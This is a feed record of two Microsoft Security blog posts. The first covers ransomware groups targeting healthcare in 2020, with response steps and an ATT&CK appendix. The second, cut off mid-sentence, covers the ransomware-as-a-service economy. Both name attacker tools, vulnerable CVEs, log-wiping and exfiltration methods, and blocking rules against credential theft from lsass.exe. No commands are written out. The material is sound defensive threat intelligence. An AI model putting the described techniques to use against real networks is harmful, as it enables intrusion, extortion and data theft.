gaining control over a domain admin account through credential theft, campaign operators used Cobalt Strike, PsExec, and a plethora of other tools to deploy various payloads and access data. They established fileless persistence using scheduled tasks and services that launched PowerShell-based remote shells. They also turned on Windows Remote Management for persistent control using stolen domain admin privileges. To weaken security controls in preparation for ransomware deployment, they manipulated various settings through Group Policy.\n\n### REvil ransomware\n\nPossibly the first ransomware group to take advantage of the network device vulnerabilities in Pulse VPN to steal credentials to access networks, REvil (also called Sodinokibi) gained notoriety for accessing MSPs and accessing the networks and documents of customers \u2013 and selling access to both. They kept up this activity during the COVID-19 crisis, targeting MSPs and other targets like local governments. REvil attacks are differentiated in their uptake of new vulnerabilities, but their techniques overlap with many other groups, relying on credential theft tools like Mimikatz once in the network and performing lateral movement and reconnaissance with tools like PsExec.\n\n### Other ransomware families\n\nOther ransomware families used in human-operated campaigns during this period include:\n\n * Paradise, which used to be distributed directly via email but is now used in human-operated ransomware attacks\n * RagnarLocker, which is deployed by a group that heavily uses RDP and Cobalt Strike with stolen credentials\n * MedusaLocker, which is possibly deployed via existing Trickbot infections\n * LockBit, which is distributed by operators that use the publicly available penetration testing tool CrackMapExec to move laterally\n\n## Immediate response actions for active attacks\n\nWe highly recommend that organizations immediately check if they have any alerts related to these ransomware attacks and prioritize investigation and remediation. Malicious behaviors relevant to these attacks that defenders should pay attention to include:\n\n * Malicious PowerShell, Cobalt Strike, and other penetration-testing tools that can allow attacks to blend in as benign red team activities\n * Credential theft activities, such as suspicious access to Local Security Authority Subsystem Service (LSASS) or suspicious registry modifications, which can indicate new attacker payloads and tools for stealing credentials\n * Any tampering with a security event log, forensic artifact such as the USNJournal, or a security agent, which attackers do to evade detections and to erase chances of recovering data\n\nCustomers using [Microsoft Defender Advanced Threat Protection (ATP)](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>) can consult a companion [threat analytics](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/threat-analytics>) report for more details on relevant alerts, as well as advanced hunting queries. Customers subscribed to the [Microsoft Threat Experts](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts>) service can also refer to the [targeted attack notification](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/microsoft-threat-experts#targeted-attack-notification>), which has detailed timelines of attacks, recommended mitigation steps for disrupting attacks, and remediation advice.\n\nIf your network is affected, perform the following scoping and investigation activities immediately to understand the impact of this breach. Using indicators of compromise (IOCs) alone to determine impact from these threats is not a durable solution, as most of these ransomware campaigns employ \u201cone-time use\u201d infrastructure for campaigns, and often change their tools and systems once they determine the detection capabilities of their targets. Detections and mitigations should concentrate on holistic behavioral based hunting where possible, and hardening infrastructure weaknesses favored by these attackers as soon as possible.\n\n### Investigate affected endpoints and credentials\n\nInvestigate endpoints affected by these attacks and identify all the credentials present on those endpoints. Assume that these credentials were available to attackers and that all associated accounts are compromised. Note that attackers can not only dump credentials for accounts that have logged on to interactive or RDP sessions, but can also dump cached credentials and passwords for service accounts and scheduled tasks that are stored in the LSA Secrets section of the registry.\n\n * For endpoints onboarded to [Microsoft Defender ATP](<https://www.microsoft.com/en-us/microsoft-365/windows/microsoft-defender-atp>), use advanced hunting to identify accounts that have logged on to affected endpoints. The threat analytics report contains a hunting query for this purpose.\n * Otherwise, check the Windows Event Log for post-compromise logons\u2014those that occur after or during the earliest suspected breach activity\u2014with event ID 4624 and logon type 2 or 10. For any other timeframe, check for logon type 4 or 5.\n\n### Isolate compromised endpoints\n\nIsolate endpoints that have command-and-control beacons or have been lateral movement targets. Locate these endpoints using advanced hunting queries or other methods of directly searching for related IOCs. [Isolate machines](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/respond-machine-alerts#isolate-machines-from-the-network>) using Microsoft Defender ATP, or use other data sources, such as NetFlow, and search through your SIEM or other centralized event management solutions. Look for lateral movement from known affected endpoints.\n\n### Address internet-facing weaknesses\n\nIdentify perimeter systems that attackers might have utilized to access your network. You can use a public scanning interface, such as [_shodan.io_](<https://www.shodan.io/>), to augment your own data. Systems that should be considered of interest to attackers include:\n\n * RDP or Virtual Desktop endpoints without MFA\n * Citrix ADC systems affected by CVE-2019-19781\n * Pulse Secure VPN systems affected by CVE-2019-11510\n * Microsoft SharePoint servers affected by CVE-2019-0604\n * Microsoft Exchange servers affected by CVE-2020-0688\n * Zoho ManageEngine systems affected by CVE-2020-10189\n\nTo further reduce organizational exposure, Microsoft Defender ATP customers can use the [Threat and Vulnerability Management (TVM)](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/next-gen-threat-and-vuln-mgt>) capability to discover, prioritize, and remediate vulnerabilities and misconfigurations. TVM allows security administrators and IT administrators to collaborate seamlessly to remediate issues.\n\n### Inspect and rebuild devices with related malware infections\n\nMany ransomware operators enter target networks through existing infections of malware like Emotet and Trickbot. These malware families, traditionally considered to be banking trojans, have been used to deliver all kinds of payloads, including persistent implants. Investigate and remediate any known infections and consider them possible vectors for sophisticated human adversaries. Ensure that you check for exposed credentials, additional payloads, and lateral movement prior to rebuilding affected endpoints or resetting passwords.\n\n## Building security hygiene to defend networks against human-operated ransomware\n\nAs ransomware operators continue to compromise new targets, defenders should proactively assess risk using all available tools. You should continue to enforce proven preventive solutions\u2014credential hygiene, minimal privileges, and host firewalls\u2014to stymie these attacks, which have been consistently observed taking advantage of security hygiene issues and over-privileged credentials.\n\nApply these measures to make your network more resilient against new breaches, reactivation of dormant implants, or lateral movement:\n\n * Randomize local administrator passwords using a tool such as LAPS.\n * Apply [Account Lockout Policy](<https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/account-lockout-policy>).\n * Ensure good perimeter security by patching exposed systems. Apply mitigating factors, such as MFA or vendor-supplied mitigation guidance, for vulnerabilities.\n * Utilize [host firewalls to limit lateral movement](<https://support.microsoft.com/en-us/help/3185535/preventing-smb-traffic-from-lateral-connections>). Preventing endpoints from communicating on TCP port 445 for SMB will have limited negative impact on most networks, but can significantly disrupt adversary activities.\n * Turn on cloud-delivered protection for Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a huge majority of new and unknown variants.\n * Follow standard guidance in the [security baselines](<https://techcommunity.microsoft.com/t5/microsoft-security-baselines/bg-p/Microsoft-Security-Baselines>) for Office and Office 365 and the Windows security baselines. Use [Microsoft Secure Score](<https://docs.microsoft.com/en-us/microsoft-365/security/mtp/microsoft-secure-score-preview>) assesses to measures security posture and get recommended improvement actions, guidance, and control.\n * Turn on [tamper protection](<https://techcommunity.microsoft.com/t5/Microsoft-Defender-ATP/Tamper-protection-now-generally-available-for-Microsoft-Defender/ba-p/911482>) features to prevent attackers from stopping security services.\n * Turn on [attack surface reduction rules](<https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-atp/attack-surface-reduction>), including rules that can block ransomware activity: \n * Use advanced protection against ransomware\n * Block process creations originating from PsExec and WMI commands\n * Block credential stealing from the Windows local security authority subsystem (lsass.exe)\n\nFor additional guidance on improving defenses against human-operated ransomware and building better security posture against cyberattacks in general, read [Human-operated ransomware attacks: A preventable disaster](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>).\n\n## Microsoft Threat Protection: Coordinated defense against complex and wide-reaching human-operated ransomware\n\nWhat we\u2019ve learned from the increase in ransomware deployments in April is that attackers pay no attention to the real-world consequences of disruption in services\u2014in this time of global crisis\u2014that their attacks cause.\n\nHuman-operated ransomware attacks represent a different level of threat because adversaries are adept at systems administration and security misconfigurations and can therefore adapt to any path of least resistance they find in a compromised network. If they run into a wall, they try to break through. And if they can\u2019t break through a wall, they\u2019ve shown that they can skillfully find other ways to move forward with their attack. As a result, human-operated ransomware attacks are complex and wide-reaching. No two attacks are exactly the same.\n\n[Microsoft Threat Protections (MTP)](<https://www.microsoft.com/en-us/security/technology/threat-protection>) provides coordinated defenses that uncover the complete attack chain and help block sophisticated attacks like human-operated ransomware. MTP combines the capabilities of multiple Microsoft 365 security services to orchestrate protection, prevention, detection, and response across endpoints, email, identities, and apps.\n\nThrough built-in intelligence, automation, and integration, MTP can block attacks, eliminate their persistence, and auto-heal affected assets. It correlates signals and consolidates alerts to help defenders prioritize incidents for investigation and response. MTP also provides a unique cross-domain hunting capability that can further help defenders identify attack sprawl and get org-specific insights for hardening defenses.\n\nMicrosoft Threat Protection is also part of a [chip-to-cloud security approach](<https://www.microsoft.com/security/blog/2020/03/17/secured-core-pcs-a-brief-showcase-of-chip-to-cloud-security-against-kernel-attacks/>) that combines threat defense on the silicon, operating system, and cloud. Hardware-backed security features on Windows 10 like address space layout randomization (ASLR), Control Flow Guard (CFG), and others harden the platform against many advanced threats, including ones that take advantage of vulnerable kernel drivers. These platform security features seamlessly integrate with Microsoft Defender ATP, providing end-to-end security that starts from a strong hardware root of trust. On [Secured-core PCs](<https://www.microsoft.com/en-us/windowsforbusiness/windows10-secured-core-computers>) these mitigations are enabled by default.\n\nWe continue to work with our customers, partners, and the research community to track human-operated ransomware and other sophisticated attacks. For dire cases customers can use available services like the [Microsoft Detection and Response (DART) team](<https://www.microsoft.com/security/blog/microsoft-detection-and-response-team-dart-blog-series/>) to help investigate and remediate.\n\n \n\n_Microsoft Threat Protection Intelligence Team_\n\n \n\n## Appendix: MITRE ATT&amp;CK techniques observed\n\nHuman-operated ransomware campaigns employ a broad range of techniques made possible by attacker control over privileged domain accounts. The techniques listed here are techniques commonly used during attacks against healthcare and critical services in April 2020.\n\nCredential access\n\n * [T1003 Credential Dumping](<https://attack.mitre.org/techniques/T1003/>) | Use of LaZagne, Mimikatz, LsaSecretsView, and other credential dumping tools and exploitation of [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) on vulnerable endpoints\n\nPersistence\n\n * [T1084 Windows Management Instrumentation Event Subscription](<https://attack.mitre.org/techniques/T1084/>) | WMI event subscription\n * [T1136 Create Account](<https://attack.mitre.org/techniques/T1136/>) | Creation of new accounts for RDP\n\nCommand and control\n\n * [T1043 Commonly Used Port](<https://attack.mitre.org/techniques/T1043/>) | Use of port 443\n\nDiscovery\n\n * [T1033 System Owner/User Discovery](<https://attack.mitre.org/techniques/T1033/>) | Various commands\n * [T1087 Account Discovery](<https://attack.mitre.org/techniques/T1087/>) | LDAP and AD queries and other commands\n * [T1018 Remote System Discovery](<https://attack.mitre.org/techniques/T1018/>) | Pings, qwinsta, and other tools and commands\n * [T1482 Domain Trust Discovery](<https://attack.mitre.org/techniques/T1482/>) | Domain trust enumeration using Nltest\n\nExecution\n\n * [T1035 Service Execution](<https://attack.mitre.org/techniques/T1035/>) | Service registered to run CMD (as ComSpec) and PowerShell commands\n\nLateral movement\n\n * [T1076 Remote Desktop Protocol](<https://attack.mitre.org/techniques/T1076/>) | Use of RDP to reach other machines in the network\n * [T1105 Remote File Copy](<https://attack.mitre.org/techniques/T1105/>) | Lateral movement using WMI and PsExec\n\nDefense evasion\n\n * [T1070 Indicator Removal on Host](<https://attack.mitre.org/techniques/T1070/>) | Clearing of event logs using wevutil, removal of USNJournal using fsutil, and deletion of slack space on drive using cipher.exe\n * [T1089 Disabling Security Tools](<https://attack.mitre.org/techniques/T1089/>) | Stopping or tampering with antivirus and other security using ProcessHacker and exploitation of vulnerable software drivers\n\nImpact\n\n * [T1489 Service Stop](<https://attack.mitre.org/techniques/T1489/>) | Stopping of services prior to encryption\n * [T1486 Data Encrypted for Impact](<https://attack.mitre.org/techniques/T1486/>) | Ransomware encryption\n\nThe post [Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk](<https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-04-28T16:00:49", "type": "mssecure", "title": "Ransomware groups continue to target healthcare, critical services; here\u2019s how to reduce risk", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T15:51:15", "description": "Microsoft processes 24 trillion signals every 24 hours, and we have blocked billions of attacks in the last year alone. Microsoft Security tracks more than 35 unique ransomware families and 250 unique threat actors across observed nation-state, ransomware, and criminal activities.\n\nThat depth of signal intelligence gathered from various domains\u2014identity, email, data, and cloud\u2014provides us with insight into the gig economy that attackers have created with tools designed to lower the barrier for entry for other attackers, who in turn continue to pay dividends and fund operations through the sale and associated \u201ccut\u201d from their tool\u2019s success.\n\nThe cybercriminal economy is a continuously evolving connected ecosystem of many players with different techniques, goals, and skillsets. In the same way our traditional economy has shifted toward gig workers for efficiency, criminals are learning that there\u2019s less work and less risk involved by renting or selling their tools for a portion of the profits than performing the attacks themselves. This industrialization of the cybercrime economy has made it easier for attackers to use ready-made penetration testing and other tools to perform their attacks.\n\nWithin this category of threats, Microsoft has been tracking the trend in the ransomware-as-a-service (RaaS) gig economy, called [human-operated ransomware](<https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/>), which remains one of the most impactful threats to organizations. We coined the industry term \u201chuman-operated ransomware\u201d to clarify that these threats are driven by humans who make decisions at every stage of their attacks based on what they find in their target\u2019s network.\n\nUnlike the broad targeting and opportunistic approach of earlier ransomware infections, attackers behind these human-operated campaigns vary their attack patterns depending on their discoveries\u2014for example, a security product that isn\u2018t configured to prevent tampering or a service that\u2019s running as a highly privileged account like a domain admin. Attackers can use those weaknesses to elevate their privileges to steal even more valuable data, leading to a bigger payout for them\u2014with no guarantee they\u2019ll leave their target environment once they\u2019ve been paid. Attackers are also often more determined to stay on a network once they gain access and sometimes repeatedly monetize that access with additional attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nRansomware attacks have become even more impactful in recent years as more ransomware-as-a-service ecosystems have adopted the double extortion monetization strategy. All ransomware is a form of extortion, but now, attackers are not only encrypting data on compromised devices but also exfiltrating it and then posting or threatening to post it publicly to pressure the targets into paying the ransom. Most ransomware attackers opportunistically deploy ransomware to whatever network they get access to, and some even purchase access to networks from other cybercriminals. Some attackers prioritize organizations with higher revenues, while others prefer specific industries for the shock value or type of data they can exfiltrate.\n\nAll human-operated ransomware campaigns\u2014all human-operated attacks in general, for that matter\u2014share common dependencies on security weaknesses that allow them to succeed. Attackers most commonly take advantage of **an organization\u2019s poor credential hygiene and legacy configurations or misconfigurations to find easy entry and privilege escalation points in an environment.** \n\nIn this blog, we detail several of the ransomware ecosystems using the RaaS model, the importance of cross-domain visibility in finding and evicting these actors, and best practices organizations can use to protect themselves from this increasingly popular style of attack. We also offer security best practices on credential hygiene and cloud hardening, how to address security blind spots, harden internet-facing assets to understand your perimeter, and more. Here\u2019s a quick table of contents:\n\n 1. **How RaaS redefines our understanding of ransomware incidents**\n * The RaaS affiliate model explained\n * Access for sale and mercurial targeting\n 2. **\u201cHuman-operated\u201d means human decisions**\n * Exfiltration and double extortion\n * Persistent and sneaky access methods\n 3. **Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks**\n 4. **Defending against ransomware: Moving beyond protection by detection**\n * Building credential hygiene\n * Auditing credential exposure\n * Prioritizing deployment of Active Directory updates\n * Cloud hardening\n * Addressing security blind spots\n * Reducing the attack surface\n * Hardening internet-facing assets and understanding your perimeter\n\n## How RaaS redefines our understanding of ransomware incidents\n\nWith ransomware being the preferred method for many cybercriminals to monetize attacks, human-operated ransomware remains one of the most impactful threats to organizations today, and it only continues to evolve. This evolution is driven by the \u201chuman-operated\u201d aspect of these attacks\u2014attackers make informed and calculated decisions, resulting in varied attack patterns tailored specifically to their targets and iterated upon until the attackers are successful or evicted.\n\nIn the past, we\u2019ve observed a tight relationship between the initial entry vector, tools, and ransomware payload choices in each campaign of one strain of ransomware. The RaaS affiliate model, which has allowed more criminals, regardless of technical expertise, to deploy ransomware built or managed by someone else, is weakening this link. As ransomware deployment becomes a gig economy, it has become more difficult to link the tradecraft used in a specific attack to the ransomware payload developers.\n\nReporting a ransomware incident by assigning it with the payload name gives the impression that a monolithic entity is behind all attacks using the same ransomware payload and that all incidents that use the ransomware share common techniques and infrastructure. However, focusing solely on the ransomware stage obscures many stages of the attack that come before, including actions like data exfiltration and additional persistence mechanisms, as well as the numerous detection and protection opportunities for network defenders.\n\nWe know, for example, that the underlying techniques used in human-operated ransomware campaigns haven\u2019t changed very much over the years\u2014attacks still prey on the same security misconfigurations to succeed. Securing a large corporate network takes disciplined and sustained focus, but there\u2019s a high ROI in implementing critical controls that prevent these attacks from having a wider impact, even if it\u2019s only possible on the most critical assets and segments of the network. \n\nWithout the ability to steal access to highly privileged accounts, attackers can\u2019t move laterally, spread ransomware widely, access data to exfiltrate, or use tools like Group Policy to impact security settings. Disrupting common attack patterns by applying security controls also reduces alert fatigue in security SOCs by stopping the attackers before they get in. This can also prevent unexpected consequences of short-lived breaches, such as exfiltration of network topologies and configuration data that happens in the first few minutes of execution of some trojans.\n\nIn the following sections, we explain the RaaS affiliate model and disambiguate between the attacker tools and the various threat actors at play during a security incident. Gaining this clarity helps surface trends and common attack patterns that inform defensive strategies focused on preventing attacks rather than detecting ransomware payloads. Threat intelligence and insights from this research also enrich our solutions like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), whose comprehensive security capabilities help protect customers by detecting RaaS-related attack attempts.\n\n### The RaaS affiliate model explained\n\nThe cybercriminal economy\u2014a connected ecosystem of many players with different techniques, goals, and skillsets\u2014is evolving. The industrialization of attacks has progressed from attackers using off-the-shelf tools, such as Cobalt Strike, to attackers being able to purchase access to networks and the payloads they deploy to them. This means that the impact of a successful ransomware and extortion attack remains the same regardless of the attacker\u2019s skills.\n\nRaaS is an arrangement between an operator and an affiliate. The RaaS operator develops and maintains the tools to power the ransomware operations, including the builders that produce the ransomware payloads and payment portals for communicating with victims. The RaaS program may also include a leak site to share snippets of data exfiltrated from victims, allowing attackers to show that the exfiltration is real and try to extort payment. Many RaaS programs further incorporate a suite of extortion support offerings, including leak site hosting and integration into ransom notes, as well as decryption negotiation, payment pressure, and cryptocurrency transaction services\n\nRaaS thus gives a unified appearance of the payload or campaign being a single ransomware family or set of attackers. However, what happens is that the RaaS operator sells access to the ransom payload and decryptor to an affiliate, who performs the intrusion and privilege escalation and who is responsible for the deployment of the actual ransomware payload. The parties then split the profit. In addition, RaaS developers and operators might also use the payload for profit, sell it, and run their campaigns with other ransomware payloads\u2014further muddying the waters when it comes to tracking the criminals behind these actions.\n\nFigure 1. How the RaaS affiliate model enables ransomware attacks\n\n### Access for sale and mercurial targeting\n\nA component of the cybercriminal economy is selling access to systems to other attackers for various purposes, including ransomware. Access brokers can, for instance, infect systems with malware or a botnet and then sell them as a \u201cload\u201d. A load is designed to install other malware or backdoors onto the infected systems for other criminals. Other access brokers scan the internet for vulnerable systems, like exposed Remote Desktop Protocol (RDP) systems with weak passwords or unpatched systems, and then compromise them _en masse_ to \u201cbank\u201d for later profit. Some advertisements for the sale of initial access specifically cite that a system isn\u2019t managed by an antivirus or endpoint detection and response (EDR) product and has a highly privileged credential such as Domain Administrator associated with it to fetch higher prices.\n\nMost ransomware attackers opportunistically deploy ransomware to whatever network they get access to. Some attackers prioritize organizations with higher revenues, while some target specific industries for the shock value or type of data they can exfiltrate (for example, attackers targeting hospitals or exfiltrating data from technology companies). In many cases, the targeting doesn\u2019t manifest itself as specifically attacking the target\u2019s network, instead, the purchase of access from an access broker or the use of existing malware infection to pivot to ransomware activities.\n\nIn some ransomware attacks, the affiliates who bought a load or access may not even know or care how the system was compromised in the first place and are just using it as a \u201cjump server\u201d to perform other actions in a network. Access brokers often list the network details for the access they are selling, but affiliates aren\u2019t usually interested in the network itself but rather the monetization potential. As a result, some attacks that seem targeted to a specific industry might simply be a case of affiliates purchasing access based on the number of systems they could deploy ransomware to and the perceived potential for profit.\n\n## \u201cHuman-operated\u201d means human decisions\n\nMicrosoft coined the term \u201chuman-operated ransomware\u201d to clearly define a class of attacks driven by expert human intelligence at every step of the attack chain and culminate in intentional business disruption and extortion. Human-operated ransomware attacks share commonalities in the security misconfigurations of which they take advantage and the manual techniques used for lateral movement and persistence. However, the human-operated nature of these actions means that variations in attacks\u2014including objectives and pre-ransom activity\u2014evolve depending on the environment and the unique opportunities identified by the attackers.\n\nThese attacks involve many reconnaissance activities that enable human operators to profile the organization and know what next steps to take based on specific knowledge of the target. Many of the initial access campaigns that provide access to RaaS affiliates perform automated reconnaissance and exfiltration of information collected in the first few minutes of an attack.\n\nAfter the attack shifts to a hands-on-keyboard phase, the reconnaissance and activities based on this knowledge can vary, depending on the tools that come with the RaaS and the operator\u2019s skill. Frequently attackers query for the currently running security tools, privileged users, and security settings such as those defined in Group Policy before continuing their attack. The data discovered via this reconnaissance phase informs the attacker\u2019s next steps.\n\nIf there\u2019s minimal security hardening to complicate the attack and a highly privileged account can be gained immediately, attackers move directly to deploying ransomware by editing a Group Policy. The attackers take note of security products in the environment and attempt to tamper with and disable these, sometimes using scripts or tools provided with RaaS purchase that try to disable multiple security products at once, other times using specific commands or techniques performed by the attacker. \n\nThis human decision-making early in the reconnaissance and intrusion stages means that even if a target\u2019s security solutions detect specific techniques of an attack, the attackers may not get fully evicted from the network and can use other collected knowledge to attempt to continue the attack in ways that bypass security controls. In many instances, attackers test their attacks \u201cin production\u201d from an undetected location in their target\u2019s environment, deploying tools or payloads like commodity malware. If these tools or payloads are detected and blocked by an antivirus product, the attackers simply grab a different tool, modify their payload, or tamper with the security products they encounter. Such detections could give SOCs a false sense of security that their existing solutions are working. However, these could merely serve as a smokescreen to allow the attackers to further tailor an attack chain that has a higher probability of success. Thus, when the attack reaches the active attack stage of deleting backups or shadow copies, the attack would be minutes away from ransomware deployment. The adversary would likely have already performed harmful actions like the exfiltration of data. This knowledge is key for SOCs responding to ransomware: prioritizing investigation of alerts or detections of tools like Cobalt Strike and performing swift remediation actions and incident response (IR) procedures are critical for containing a human adversary before the ransomware deployment stage.\n\n### Exfiltration and double extortion\n\nRansomware attackers often profit simply by disabling access to critical systems and causing system downtime. Although that simple technique often motivates victims to pay, it is not the only way attackers can monetize their access to compromised networks. Exfiltration of data and \u201cdouble extortion,\u201d which refers to attackers threatening to leak data if a ransom hasn\u2019t been paid, has also become a common tactic among many RaaS affiliate programs\u2014many of them offering a unified leak site for their affiliates. Attackers take advantage of common weaknesses to exfiltrate data and demand ransom without deploying a payload.\n\nThis trend means that focusing on protecting against ransomware payloads via security products or encryption, or considering backups as the main defense against ransomware, instead of comprehensive hardening, leaves a network vulnerable to all the stages of a human-operated ransomware attack that occur before ransomware deployment. This exfiltration can take the form of using tools like Rclone to sync to an external site, setting up email transport rules, or uploading files to cloud services. With double extortion, attackers don\u2019t need to deploy ransomware and cause downtime to extort money. Some attackers have moved beyond the need to deploy ransomware payloads and are shifting straight to extortion models or performing the destructive objectives of their attacks by directly deleting cloud resources. One such extortion attackers is DEV-0537 (also known as LAPSUS$), which is profiled below. \n\n### Persistent and sneaky access methods\n\nPaying the ransom may not reduce the risk to an affected network and potentially only serves to fund cybercriminals. Giving in to the attackers\u2019 demands doesn\u2019t guarantee that attackers ever \u201cpack their bags\u201d and leave a network. Attackers are more determined to stay on a network once they gain access and sometimes repeatedly monetize attacks using different malware or ransomware payloads if they aren\u2019t successfully evicted.\n\nThe handoff between different attackers as transitions in the cybercriminal economy occur means that multiple attackers may retain persistence in a compromised environment using an entirely different set of tools from those used in a ransomware attack. For example, initial access gained by a banking trojan leads to a Cobalt Strike deployment, but the RaaS affiliate that purchased the access may choose to use a less detectable remote access tool such as TeamViewer to maintain persistence on the network to operate their broader series of campaigns. Using legitimate tools and settings to persist versus malware implants such as Cobalt Strike is a popular technique among ransomware attackers to avoid detection and remain resident in a network for longer.\n\nSome of the common enterprise tools and techniques for persistence that Microsoft has observed being used include:\n\n * AnyDesk\n * Atera Remote Management\n * ngrok.io\n * Remote Manipulator System\n * Splashtop\n * TeamViewer\n\nAnother popular technique attackers perform once they attain privilege access is the creation of new backdoor user accounts, whether local or in Active Directory. These newly created accounts can then be added to remote access tools such as a virtual private network (VPN) or Remote Desktop, granting remote access through accounts that appear legitimate on the network. Ransomware attackers have also been observed editing the settings on systems to enable Remote Desktop, reduce the protocol\u2019s security, and add new users to the Remote Desktop Users group.\n\nThe time between initial access to a hands-on keyboard deployment can vary wildly depending on the groups and their workloads or motivations. Some activity groups can access thousands of potential targets and work through these as their staffing allows, prioritizing based on potential ransom payment over several months. While some activity groups may have access to large and highly resourced companies, they prefer to attack smaller companies for less overall ransom because they can execute the attack within hours or days. In addition, the return on investment is higher from companies that can\u2019t respond to a major incident. Ransoms of tens of millions of dollars receive much attention but take much longer to develop. Many groups prefer to ransom five to 10 smaller targets in a month because the success rate at receiving payment is higher in these targets. Smaller organizations that can\u2019t afford an IR team are often more likely to pay tens of thousands of dollars in ransom than an organization worth millions of dollars because the latter has a developed IR capability and is likely to follow legal advice against paying. In some instances, a ransomware associate threat actor may have an implant on a network and never convert it to ransom activity. In other cases, initial access to full ransom (including handoff from an access broker to a RaaS affiliate) takes less than an hour.\n\nFigure 2. Human-operated ransomware targeting and rate of success, based on a sampling of Microsoft data over six months between 2021 and 2022\n\nThe human-driven nature of these attacks and the scale of possible victims under control of ransomware-associated threat actors underscores the need to take targeted proactive security measures to harden networks and prevent these attacks in their early stages.\n\n## Threat actors and campaigns deep dive: Threat intelligence-driven response to human-operated ransomware attacks\n\nFor organizations to successfully respond to evict an active attacker, it\u2019s important to understand the active stage of an ongoing attack. In the early attack stages, such as deploying a banking trojan, common remediation efforts like isolating a system and resetting exposed credentials may be sufficient. As the attack progresses and the attacker performs reconnaissance activities and exfiltration, it\u2019s important to implement an incident response process that scopes the incident to address the impact specifically. Using a threat intelligence-driven methodology for understanding attacks can assist in determining incidents that need additional scoping.\n\nIn the next sections, we provide a deep dive into the following prominent ransomware threat actors and their campaigns to increase community understanding of these attacks and enable organizations to better protect themselves:\n\n * DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today \n * ELBRUS: (Un)arrested development\n * DEV-0504: Shifting payloads reflecting the rise and fall of RaaS programs\n * DEV-0237: Prolific collaborator\n * DEV-0206 and DEV-0243: An \u201cevil\u201d partnership\n * DEV-0401: China-based lone wolf turned LockBit 2.0 affiliate\n * DEV-0537: From extortion to destruction\n\nMicrosoft threat intelligence directly informs our products as part of our commitment to track adversaries and protect customers. Microsoft 365 Defender customers should prioritize alerts titled \u201cRansomware-linked emerging threat activity group detected\u201d. We also add the note \u201cOngoing hands-on-keyboard attack\u201d to alerts that indicate a human attacker is in the network. When these alerts are raised, it\u2019s highly recommended to initiate an incident response process to scope the attack, isolate systems, and regain control of credentials attackers may be in control of.\n\nA note on threat actor naming: as part of Microsoft\u2019s ongoing commitment to track both nation-state and cybercriminal threat actors, we refer to the unidentified threat actors as a \u201cdevelopment group\u201d. We use a naming structure with a prefix of \u201cDEV\u201d to indicate an emerging threat group or unique activity during investigation. When a nation-state group moves out of the DEV stage, we use chemical elements (for example, PHOSPHOROUS and NOBELIUM) to name them. On the other hand, we use volcano names (such as ELBRUS) for ransomware or cybercriminal activity groups that have moved out of the DEV state. In the cybercriminal economy, relationships between groups change very rapidly. Attackers are known to hire talent from other cybercriminal groups or use \u201ccontractors,\u201d who provide gig economy-style work on a limited time basis and may not rejoin the group. This shifting nature means that many of the groups Microsoft tracks are labeled as DEV, even if we have a concrete understanding of the nature of the activity group.\n\n### DEV-0193 cluster (Trickbot LLC): The most prolific ransomware group today\n\nA vast amount of the current cybercriminal economy connects to a nexus of activity that Microsoft tracks as DEV-0193, also referred to as Trickbot LLC. DEV-0193 is responsible for developing, distributing, and managing many different payloads, including Trickbot, Bazaloader, and AnchorDNS. In addition, DEV-0193 managed the Ryuk RaaS program before the latter\u2019s shutdown in June 2021, and Ryuk\u2019s successor, Conti as well as Diavol. Microsoft has been tracking the activities of DEV-0193 since October 2020 and has observed their expansion from developing and distributing the Trickbot malware to becoming the most prolific ransomware-associated cybercriminal activity group active today. \n\nDEV-0193\u2019s actions and use of the cybercriminal gig economy means they often add new members and projects and utilize contractors to perform various parts of their intrusions. As other malware operations have shut down for various reasons, including legal actions, DEV-0193 has hired developers from these groups. Most notable are the acquisitions of developers from Emotet, Qakbot, and IcedID, bringing them to the DEV-0193 umbrella.\n\nA 